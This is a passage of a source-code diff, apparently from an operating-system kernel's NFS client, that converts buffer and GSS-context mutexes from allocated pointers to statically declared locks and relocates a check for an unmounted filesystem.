@@ -1551,7 +1548,7 @@ nfs_buf_iterprepare(nfsnode_t np, struct nfsbuflists *iterheadp, int flags)
 
        while (np->n_bufiterflags & NBI_ITER) {
                np->n_bufiterflags |= NBI_ITERWANT;
-               msleep(&np->n_bufiterflags, nfs_buf_mutex, 0, "nfs_buf_iterprepare", NULL);
+               msleep(&np->n_bufiterflags, &nfs_buf_mutex, 0, "nfs_buf_iterprepare", NULL);
        }
        if (LIST_EMPTY(listheadp)) {
                LIST_INIT(iterheadp);
@@ -1778,19 +1775,19 @@ nfs_buf_read_rpc(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred)
                SET(bp->nb_flags, NB_ERROR);
                if (ISSET(bp->nb_flags, NB_MULTASYNCRPC)) {
                        nrpcs = (length + nmrsize - 1) / nmrsize;
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        bp->nb_rpcs -= nrpcs;
                        if (bp->nb_rpcs == 0) {
                                /* No RPCs left, so the buffer's done */
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                nfs_buf_iodone(bp);
                        } else {
                                /* wait for the last RPC to mark it done */
                                while (bp->nb_rpcs > 0) {
-                                       msleep(&bp->nb_rpcs, nfs_buf_mutex, 0,
+                                       msleep(&bp->nb_rpcs, &nfs_buf_mutex, 0,
                                            "nfs_buf_read_rpc_cancel", NULL);
                                }
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                        }
                } else {
                        nfs_buf_iodone(bp);
@@ -1993,14 +1990,14 @@ out:
 
        multasyncrpc = ISSET(bp->nb_flags, NB_MULTASYNCRPC);
        if (multasyncrpc) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
        }
 
        bp->nb_rpcs--;
        finished = (bp->nb_rpcs == 0);
 
        if (multasyncrpc) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
 
        if (finished) {
@@ -2513,21 +2510,21 @@ nfs_buf_write(struct nfsbuf *bp)
 
        CLR(bp->nb_flags, (NB_READ | NB_DONE | NB_ERROR | NB_DELWRI));
        if (ISSET(oldflags, NB_DELWRI)) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                nfs_nbdwrite--;
                NFSBUFCNTCHK();
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                wakeup(&nfs_nbdwrite);
        }
 
        /* move to clean list */
        if (ISSET(oldflags, (NB_ASYNC | NB_DELWRI))) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                if (bp->nb_vnbufs.le_next != NFSNOLIST) {
                        LIST_REMOVE(bp, nb_vnbufs);
                }
                LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs);
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
        nfs_node_lock_force(np);
        np->n_numoutput++;
@@ -2694,12 +2691,12 @@ out:
                error = nfs_buf_iowait(bp);
                /* move to clean list */
                if (oldflags & NB_DELWRI) {
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        if (bp->nb_vnbufs.le_next != NFSNOLIST) {
                                LIST_REMOVE(bp, nb_vnbufs);
                        }
                        LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                }
                FSDBG_BOT(553, bp, NBOFF(bp), bp->nb_flags, error);
                nfs_buf_release(bp, 1);
@@ -2801,10 +2798,10 @@ nfs_buf_write_finish(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred)
                CLR(bp->nb_flags, NB_INVAL);
                if (!ISSET(bp->nb_flags, NB_DELWRI)) {
                        SET(bp->nb_flags, NB_DELWRI);
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        nfs_nbdwrite++;
                        NFSBUFCNTCHK();
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                }
                /*
                 * Since for the NB_ASYNC case, we've reassigned the buffer to the
@@ -2812,12 +2809,12 @@ nfs_buf_write_finish(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred)
                 */
                if (ISSET(bp->nb_flags, NB_ASYNC)) {
                        /* move to dirty list */
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        if (bp->nb_vnbufs.le_next != NFSNOLIST) {
                                LIST_REMOVE(bp, nb_vnbufs);
                        }
                        LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                }
        } else {
                /* either there's an error or we don't need to commit */
@@ -3051,19 +3048,19 @@ nfs_buf_write_rpc(struct nfsbuf *bp, int iomode, thread_t thd, kauth_cred_t cred
                SET(bp->nb_flags, NB_ERROR);
                if (ISSET(bp->nb_flags, NB_MULTASYNCRPC)) {
                        nrpcs = (length + nmwsize - 1) / nmwsize;
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        bp->nb_rpcs -= nrpcs;
                        if (bp->nb_rpcs == 0) {
                                /* No RPCs left, so the buffer's done */
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                nfs_buf_write_finish(bp, thd, cred);
                        } else {
                                /* wait for the last RPC to mark it done */
                                while (bp->nb_rpcs > 0) {
-                                       msleep(&bp->nb_rpcs, nfs_buf_mutex, 0,
+                                       msleep(&bp->nb_rpcs, &nfs_buf_mutex, 0,
                                            "nfs_buf_write_rpc_cancel", NULL);
                                }
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                        }
                } else {
                        nfs_buf_write_finish(bp, thd, cred);
@@ -3284,14 +3281,14 @@ out:
         */
        multasyncrpc = ISSET(bp->nb_flags, NB_MULTASYNCRPC);
        if (multasyncrpc) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
        }
 
        bp->nb_rpcs--;
        finished = (bp->nb_rpcs == 0);
 
        if (multasyncrpc) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
 
        if (finished) {
@@ -3364,7 +3361,7 @@ nfs_flushcommits(nfsnode_t np, int nowait)
        if (nowait) {
                flags |= NBI_NOWAIT;
        }
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        wverf = nmp->nm_verf;
        if (!nfs_buf_iterprepare(np, &blist, flags)) {
                while ((bp = LIST_FIRST(&blist))) {
@@ -3439,7 +3436,7 @@ nfs_flushcommits(nfsnode_t np, int nowait)
                }
                nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        if (LIST_EMPTY(&commitlist)) {
                error = ENOBUFS;
@@ -3514,9 +3511,9 @@ nfs_flushcommits(nfsnode_t np, int nowait)
 
                if (retv) {
                        /* move back to dirty list */
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        nfs_buf_release(bp, 1);
                        continue;
                }
@@ -3526,10 +3523,10 @@ nfs_flushcommits(nfsnode_t np, int nowait)
                nfs_node_unlock(np);
                vnode_startwrite(NFSTOV(np));
                if (ISSET(bp->nb_flags, NB_DELWRI)) {
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        nfs_nbdwrite--;
                        NFSBUFCNTCHK();
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        wakeup(&nfs_nbdwrite);
                }
                CLR(bp->nb_flags, (NB_READ | NB_DONE | NB_ERROR | NB_DELWRI));
@@ -3543,9 +3540,9 @@ nfs_flushcommits(nfsnode_t np, int nowait)
                }
 
                /* move to clean list */
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs);
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
 
                bp->nb_dirtyoff = bp->nb_dirtyend = 0;
 
@@ -3593,13 +3590,13 @@ nfs_flush(nfsnode_t np, int waitfor, thread_t thd, int ignore_writeerr)
                nfs_node_unlock(np);
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        while (np->n_bflag & NBFLUSHINPROG) {
                np->n_bflag |= NBFLUSHWANT;
-               error = msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_flush", NULL);
+               error = msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_flush", NULL);
                if ((error && (error != EWOULDBLOCK)) ||
                    ((error = nfs_sigintr(NFSTONMP(np), NULL, thd, 0)))) {
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        goto out;
                }
        }
@@ -3615,7 +3612,7 @@ nfs_flush(nfsnode_t np, int waitfor, thread_t thd, int ignore_writeerr)
 again:
        FSDBG(518, LIST_FIRST(&np->n_dirtyblkhd), np->n_flag, 0, 0);
        if (!NFSTONMP(np)) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                error = ENXIO;
                goto done;
        }
@@ -3641,7 +3638,7 @@ again:
                                                        nfs_buf_refrele(bp);
                                                }
                                                nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
-                                               lck_mtx_unlock(nfs_buf_mutex);
+                                               lck_mtx_unlock(&nfs_buf_mutex);
                                                error = error2;
                                                goto done;
                                        }
@@ -3677,14 +3674,14 @@ again:
                                continue;
                        }
                        nfs_buf_remfree(bp);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        if (ISSET(bp->nb_flags, NB_ERROR)) {
                                nfs_node_lock_force(np);
                                np->n_error = bp->nb_error ? bp->nb_error : EIO;
                                np->n_flag |= NWRITEERR;
                                nfs_node_unlock(np);
                                nfs_buf_release(bp, 1);
-                               lck_mtx_lock(nfs_buf_mutex);
+                               lck_mtx_lock(&nfs_buf_mutex);
                                continue;
                        }
                        SET(bp->nb_flags, NB_ASYNC);
@@ -3693,11 +3690,11 @@ again:
                                SET(bp->nb_flags, NB_STABLE);
                        }
                        nfs_buf_write(bp);
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                }
                nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        if (waitfor == MNT_WAIT || waitfor == MNT_DWAIT) {
                while ((error = vnode_waitforwrites(NFSTOV(np), 0, slpflag, slptimeo, "nfsflush"))) {
@@ -3730,7 +3727,7 @@ again:
                        np->n_flag |= NMODIFIED;
                        nfs_node_unlock(np);
                }
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                goto again;
        }
 
@@ -3740,11 +3737,11 @@ again:
                        np->n_flag |= NMODIFIED;
                        nfs_node_unlock(np);
                }
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                if (!LIST_EMPTY(&np->n_dirtyblkhd)) {
                        goto again;
                }
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                nfs_node_lock_force(np);
                /*
                 * OK, it looks like there are no dirty blocks.  If we have no
@@ -3775,10 +3772,10 @@ again:
        }
        nfs_node_unlock(np);
 done:
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        flags = np->n_bflag;
        np->n_bflag &= ~(NBFLUSHINPROG | NBFLUSHWANT);
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        if (flags & NBFLUSHWANT) {
                wakeup(&np->n_bflag);
        }
@@ -3810,7 +3807,7 @@ nfs_vinvalbuf_internal(
                }
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        for (;;) {
                list = NBI_CLEAN;
                if (nfs_buf_iterprepare(np, &blist, list)) {
@@ -3833,13 +3830,13 @@ nfs_vinvalbuf_internal(
                                        FSDBG(554, np, bp, -1, error);
                                        nfs_buf_refrele(bp);
                                        nfs_buf_itercomplete(np, &blist, list);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        return error;
                                }
                        }
                        nfs_buf_refrele(bp);
                        FSDBG(554, np, bp, NBOFF(bp), bp->nb_flags);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        if ((flags & V_SAVE) && UBCINFOEXISTS(NFSTOV(np)) && bp->nb_np &&
                            (NBOFF(bp) < (off_t)np->n_size)) {
                                /* extra paranoia: make sure we're not */
@@ -3921,28 +3918,28 @@ nfs_vinvalbuf_internal(
                                                         * be stuck in this loop forever because
                                                         * the buffer will continue to stay dirty.
                                                         */
-                                                       lck_mtx_lock(nfs_buf_mutex);
+                                                       lck_mtx_lock(&nfs_buf_mutex);
                                                        nfs_buf_itercomplete(np, &blist, list);
-                                                       lck_mtx_unlock(nfs_buf_mutex);
+                                                       lck_mtx_unlock(&nfs_buf_mutex);
                                                        return error;
                                                }
                                                error = 0;
                                        }
-                                       lck_mtx_lock(nfs_buf_mutex);
+                                       lck_mtx_lock(&nfs_buf_mutex);
                                        continue;
                                }
                        }
                        SET(bp->nb_flags, NB_INVAL);
                        // hold off on FREEUPs until we're done here
                        nfs_buf_release(bp, 0);
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                }
                nfs_buf_itercomplete(np, &blist, list);
        }
        if (!LIST_EMPTY(&(np)->n_dirtyblkhd) || !LIST_EMPTY(&(np)->n_cleanblkhd)) {
                panic("nfs_vinvalbuf: flush/inval failed");
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        nfs_node_lock_force(np);
        if (!(flags & V_SAVE)) {
                np->n_flag &= ~NMODIFIED;
@@ -3978,15 +3975,6 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf
 
        FSDBG_TOP(554, np, flags, intrflg, 0);
 
-       /*
-        * If the mount is gone no sense to try and write anything.
-        * and hang trying to do IO.
-        */
-       if (nfs_mount_gone(nmp)) {
-               flags &= ~V_SAVE;
-               ubcflags &= ~UBC_PUSHALL;
-       }
-
        if (nmp && !NMFLAG(nmp, INTR)) {
                intrflg = 0;
        }
@@ -3999,12 +3987,12 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf
        }
 
        /* First wait for any other process doing a flush to complete.  */
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        while (np->n_bflag & NBINVALINPROG) {
                np->n_bflag |= NBINVALWANT;
-               msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_vinvalbuf", &ts);
+               msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_vinvalbuf", &ts);
                if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) {
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        return error;
                }
                if (np->n_bflag & NBINVALINPROG) {
@@ -4012,10 +4000,15 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf
                }
        }
        np->n_bflag |= NBINVALINPROG;
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        /* Now, flush as required.  */
 again:
+       /* If the mount is gone no sense to try and write anything. and hang trying to do IO. */
+       if (nfs_mount_gone(nmp)) {
+               flags &= ~V_SAVE;
+       }
+
        error = nfs_vinvalbuf_internal(np, flags, thd, cred, slpflag, 0);
        while (error) {
                FSDBG(554, np, 0, 0, error);
@@ -4025,6 +4018,11 @@ again:
                error = nfs_vinvalbuf_internal(np, flags, thd, cred, 0, slptimeo);
        }
 
+       /* If the mount is gone no sense to try and write anything. and hang trying to do IO. */
+       if (nfs_mount_gone(nmp)) {
+               ubcflags &= ~UBC_PUSHALL;
+       }
+
        /* get the pages out of vm also */
        if (UBCINFOEXISTS(vp) && (size = ubc_getsize(vp))) {
                if ((error = ubc_msync(vp, 0, size, NULL, ubcflags))) {
@@ -4042,10 +4040,10 @@ again:
                }
        }
 done:
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        nflags = np->n_bflag;
        np->n_bflag &= ~(NBINVALINPROG | NBINVALWANT);
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        if (nflags & NBINVALWANT) {
                wakeup(&np->n_bflag);
        }
@@ -4064,7 +4062,7 @@ nfs_wait_bufs(nfsnode_t np)
        struct nfsbuflists blist;
        int error = 0;
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (!nfs_buf_iterprepare(np, &blist, NBI_CLEAN)) {
                while ((bp = LIST_FIRST(&blist))) {
                        LIST_REMOVE(bp, nb_vnbufs);
@@ -4074,7 +4072,7 @@ nfs_wait_bufs(nfsnode_t np)
                                if (error != EAGAIN) {
                                        nfs_buf_refrele(bp);
                                        nfs_buf_itercomplete(np, &blist, NBI_CLEAN);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        return;
                                }
                        }
@@ -4092,7 +4090,7 @@ nfs_wait_bufs(nfsnode_t np)
                                if (error != EAGAIN) {
                                        nfs_buf_refrele(bp);
                                        nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        return;
                                }
                        }
@@ -4101,7 +4099,7 @@ nfs_wait_bufs(nfsnode_t np)
                }
                nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 }
 
 
@@ -4124,7 +4122,7 @@ again:
                return;
        }
 
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        niod = nmp->nm_niod;
 
        /* grab an nfsiod if we don't have one already */
@@ -4140,12 +4138,12 @@ again:
                         * We may try a couple times if other callers
                         * get the new threads before we do.
                         */
-                       lck_mtx_unlock(nfsiod_mutex);
+                       lck_mtx_unlock(&nfsiod_mutex);
                        started++;
                        if (!nfsiod_start()) {
                                goto again;
                        }
-                       lck_mtx_lock(nfsiod_mutex);
+                       lck_mtx_lock(&nfsiod_mutex);
                }
        }
 
@@ -4179,23 +4177,23 @@ again:
        if (!nmp->nm_niod) {
                if (niod) { /* give it the nfsiod we just grabbed */
                        nmp->nm_niod = niod;
-                       lck_mtx_unlock(nfsiod_mutex);
+                       lck_mtx_unlock(&nfsiod_mutex);
                        wakeup(niod);
                } else if (nfsiod_thread_count > 0) {
                        /* just queue it up on nfsiod mounts queue if needed */
                        if (nmp->nm_iodlink.tqe_next == NFSNOLIST) {
                                TAILQ_INSERT_TAIL(&nfsiodmounts, nmp, nm_iodlink);
                        }
-                       lck_mtx_unlock(nfsiod_mutex);
+                       lck_mtx_unlock(&nfsiod_mutex);
                } else {
                        printf("nfs_asyncio(): no nfsiods? %d %d (%d)\n", nfsiod_thread_count, NFSIOD_MAX, started);
-                       lck_mtx_unlock(nfsiod_mutex);
+                       lck_mtx_unlock(&nfsiod_mutex);
                        /* we have no other option but to be persistent */
                        started = 0;
                        goto again;
                }
        } else {
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
        }
 
        FSDBG_BOT(552, nmp, 0, 0, 0);
index 42f8ea0acaf310b098031ca1167884fcacbdc5d6..2d90650f016490d1a899bf8b603e6620fc077933 100644 (file)
 #if CONFIG_NFS_SERVER
 u_long nfs_gss_svc_ctx_hash;
 struct nfs_gss_svc_ctx_hashhead *nfs_gss_svc_ctx_hashtbl;
-lck_mtx_t *nfs_gss_svc_ctx_mutex;
-lck_grp_t *nfs_gss_svc_grp;
+static LCK_GRP_DECLARE(nfs_gss_svc_grp, "rpcsec_gss_svc");
+static LCK_MTX_DECLARE(nfs_gss_svc_ctx_mutex, &nfs_gss_svc_grp);
 uint32_t nfsrv_gss_context_ttl = GSS_CTX_EXPIRE;
 #define GSS_SVC_CTX_TTL ((uint64_t)max(2*GSS_CTX_PEND, nfsrv_gss_context_ttl) * NSEC_PER_SEC)
 #endif /* CONFIG_NFS_SERVER */
 
 #if CONFIG_NFS_CLIENT
-lck_grp_t *nfs_gss_clnt_grp;
+LCK_GRP_DECLARE(nfs_gss_clnt_grp, "rpcsec_gss_clnt");
 #endif /* CONFIG_NFS_CLIENT */
 
 #define KRB5_MAX_MIC_SIZE 128
@@ -186,15 +186,8 @@ const uint32_t nfs_gss_ctx_max = GSS_SVC_MAXCONTEXTS;
 void
 nfs_gss_init(void)
 {
-#if CONFIG_NFS_CLIENT
-       nfs_gss_clnt_grp = lck_grp_alloc_init("rpcsec_gss_clnt", LCK_GRP_ATTR_NULL);
-#endif /* CONFIG_NFS_CLIENT */
-
 #if CONFIG_NFS_SERVER
-       nfs_gss_svc_grp  = lck_grp_alloc_init("rpcsec_gss_svc", LCK_GRP_ATTR_NULL);
-
        nfs_gss_svc_ctx_hashtbl = hashinit(SVC_CTX_HASHSZ, M_TEMP, &nfs_gss_svc_ctx_hash);
-       nfs_gss_svc_ctx_mutex = lck_mtx_alloc_init(nfs_gss_svc_grp, LCK_ATTR_NULL);
 
        nfs_gss_svc_ctx_timer_call = thread_call_allocate(nfs_gss_svc_ctx_timer, NULL);
 #endif /* CONFIG_NFS_SERVER */
@@ -537,12 +530,12 @@ nfs_gss_clnt_ctx_dump(struct nfsmount *nmp)
        lck_mtx_lock(&nmp->nm_lock);
        NFS_GSS_DBG("Enter\n");
        TAILQ_FOREACH(cp, &nmp->nm_gsscl, gss_clnt_entries) {
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                printf("context %d/%d: refcnt = %d, flags = %x\n",
                    kauth_cred_getasid(cp->gss_clnt_cred),
                    kauth_cred_getauid(cp->gss_clnt_cred),
                    cp->gss_clnt_refcnt, cp->gss_clnt_flags);
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
        }
        NFS_GSS_DBG("Exit\n");
        lck_mtx_unlock(&nmp->nm_lock);
@@ -676,12 +669,12 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
        microuptime(&now);
        lck_mtx_lock(&nmp->nm_lock);
        TAILQ_FOREACH_SAFE(cp, &nmp->nm_gsscl, gss_clnt_entries, tcp) {
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (cp->gss_clnt_flags & GSS_CTX_DESTROY) {
                        NFS_GSS_DBG("Found destroyed context %s refcnt = %d continuing\n",
                            NFS_GSS_CTX(req, cp),
                            cp->gss_clnt_refcnt);
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        continue;
                }
                if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, req->r_cred)) {
@@ -698,7 +691,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                                    bcmp(cp->gss_clnt_principal, principal, plen) != 0) {
                                        cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY);
                                        cp->gss_clnt_refcnt++;
-                                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                                        NFS_GSS_DBG("Marking %s for deletion because %s does not match\n",
                                            NFS_GSS_CTX(req, cp), principal);
                                        NFS_GSS_DBG("len = (%zu,%zu), nt = (%d,%d)\n", cp->gss_clnt_prinlen, plen,
@@ -717,7 +710,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                                if (cp->gss_clnt_nctime + GSS_NEG_CACHE_TO >= now.tv_sec || cp->gss_clnt_nctime == 0) {
                                        NFS_GSS_DBG("Context %s (refcnt = %d) not expired returning EAUTH nctime = %ld now = %ld\n",
                                            NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt, cp->gss_clnt_nctime, now.tv_sec);
-                                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                                        lck_mtx_unlock(&nmp->nm_lock);
                                        NFS_ZFREE(nfs_req_zone, treq);
                                        return NFSERR_EAUTH;
@@ -733,7 +726,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                                        NFS_GSS_DBG("Context %s has expired but we still have %d references\n",
                                            NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt);
                                        error = nfs_gss_clnt_ctx_copy(cp, &ncp);
-                                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                                        if (error) {
                                                lck_mtx_unlock(&nmp->nm_lock);
                                                NFS_ZFREE(nfs_req_zone, treq);
@@ -745,7 +738,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                                        if (cp->gss_clnt_nctime) {
                                                nmp->nm_ncentries--;
                                        }
-                                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                                        TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries);
                                        break;
                                }
@@ -753,12 +746,12 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                        /* Found a valid context to return */
                        cp->gss_clnt_refcnt++;
                        req->r_gss_ctx = cp;
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        lck_mtx_unlock(&nmp->nm_lock);
                        NFS_ZFREE(nfs_req_zone, treq);
                        return 0;
                }
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
        }
 
        if (!cp && nfs_root_steals_ctx && principal == NULL && kauth_cred_getuid(req->r_cred) == 0) {
@@ -798,7 +791,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                }
                cp->gss_clnt_cred = req->r_cred;
                kauth_cred_ref(cp->gss_clnt_cred);
-               cp->gss_clnt_mtx = lck_mtx_alloc_init(nfs_gss_clnt_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL);
                cp->gss_clnt_ptime = now.tv_sec - GSS_PRINT_DELAY;
                if (principal) {
                        MALLOC(cp->gss_clnt_principal, uint8_t *, plen + 1, M_TEMP, M_WAITOK | M_ZERO);
@@ -905,10 +898,10 @@ retry:
         * doing the context setup. Wait until the context thread
         * is null.
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        if (cp->gss_clnt_thread && cp->gss_clnt_thread != current_thread()) {
                cp->gss_clnt_flags |= GSS_NEEDCTX;
-               msleep(cp, cp->gss_clnt_mtx, slpflag | PDROP, "ctxwait", NULL);
+               msleep(cp, &cp->gss_clnt_mtx, slpflag | PDROP, "ctxwait", NULL);
                slpflag &= ~PCATCH;
                if ((error = nfs_sigintr(req->r_nmp, req, req->r_thread, 0))) {
                        return error;
@@ -916,7 +909,7 @@ retry:
                nfs_gss_clnt_ctx_unref(req);
                goto retry;
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 
        if (cp->gss_clnt_flags & GSS_CTX_COMPLETE) {
                /*
@@ -926,26 +919,26 @@ retry:
                 * we allocate a new sequence number and allow this request
                 * to proceed.
                 */
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                while (win_getbit(cp->gss_clnt_seqbits,
                    ((cp->gss_clnt_seqnum - cp->gss_clnt_seqwin) + 1) % cp->gss_clnt_seqwin)) {
                        cp->gss_clnt_flags |= GSS_NEEDSEQ;
-                       msleep(cp, cp->gss_clnt_mtx, slpflag | PDROP, "seqwin", NULL);
